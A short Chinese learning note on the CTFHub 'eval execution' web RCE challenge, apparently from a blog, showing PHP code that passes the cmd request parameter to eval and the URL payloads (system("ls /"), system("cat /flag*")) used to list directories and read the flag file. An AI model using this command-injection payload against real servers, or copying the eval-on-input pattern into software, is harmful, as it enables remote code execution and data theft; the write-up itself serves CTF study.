CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
番薯大佬20 分钟前
Python学习-day9 字典Dictionary
网络·python·学习
..过云雨31 分钟前
04.【Linux系统编程】基础开发工具2(makefile、进度条程序实现、版本控制器Git、调试器gdb/cgdb的使用)
linux·笔记·学习
理想国的女研究僧1 小时前
Jupyter Notebook操作指南(1)
ide·python·学习·jupyter
GilgameshJSS2 小时前
【学习K230-例程19】GT6700-TCP-Client
网络·python·网络协议·学习·tcp/ip
悠悠~飘2 小时前
php学习(第五天)
学习·php
能不能别报错2 小时前
K8s学习笔记(二):Pod
笔记·学习·kubernetes
呱呱巨基3 小时前
C/C++ 内存管理
c++·笔记·学习
楼田莉子4 小时前
python小项目——学生管理系统
开发语言·python·学习
在路上`4 小时前
前端学习之后端java小白(二)-sql约束/建表
java·sql·学习
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02UV安装并设置国内源03GitHub 镜像站点04conda中设置镜像地址(附所有可换的地址)05A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程0646个Nano-banana 精选提示词,持续更新中07UV 工具安装与国内镜像源配置指南08突破百度网盘的下载限速,两种方法教会你【超详细】09智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践10教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员